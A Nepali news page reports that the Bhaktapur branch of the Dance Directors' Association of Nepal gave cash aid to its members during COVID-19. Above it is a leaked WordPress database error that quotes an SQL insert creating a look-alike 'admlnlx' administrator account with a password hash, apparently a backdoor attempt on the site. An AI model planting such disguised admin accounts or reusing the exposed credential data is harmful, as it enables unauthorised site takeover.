WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRVu/vE4aho44nPPA2Tny8vNEy7VWQ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:43:59', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । नृत्य निर्देशक संघ नेपाल, भक्तपुर शाखाले कार्य समितिका आफ्नो सदस्यहरुलाई नगत सहयोग प्रदान गरेको छ ।
नृत्य निर्देशक संघ नेपाल, भक्तपुर शाखाका कार्यसमितिले विस्व (कोभिड-१९) कोरोनाले सिथिल रहेकोले सम्पूर्ण नृत्यका निर्देशक सघ भक्त्तपुर शाखाका सदस्यहरुलाई जनही रु ५००० का दरले सहयोग गरेका छन ।
विस्वमा फैलिएको महामरी (कोभिड-१९) कोरोनले गर्दा सम्पूर्ण नृत्यका काम ठप्प रहेकोले आर्थिक सहयोग गरिएको कार्यसमितिका सचिब चुडामणी फुयाले बताए ।
सहयोग हस्ताण्तरण कार्यक्रममा नृत्य निर्देशक संघ नेपालका केन्द्रीय सदस्य ऋषि केश श्रेष्ठ तथा जिल्ला अध्यक्ष दिपक बज्राचार्यले संयुक्त रुपमा सहयोग हस्तातरण गर्नुभयो ।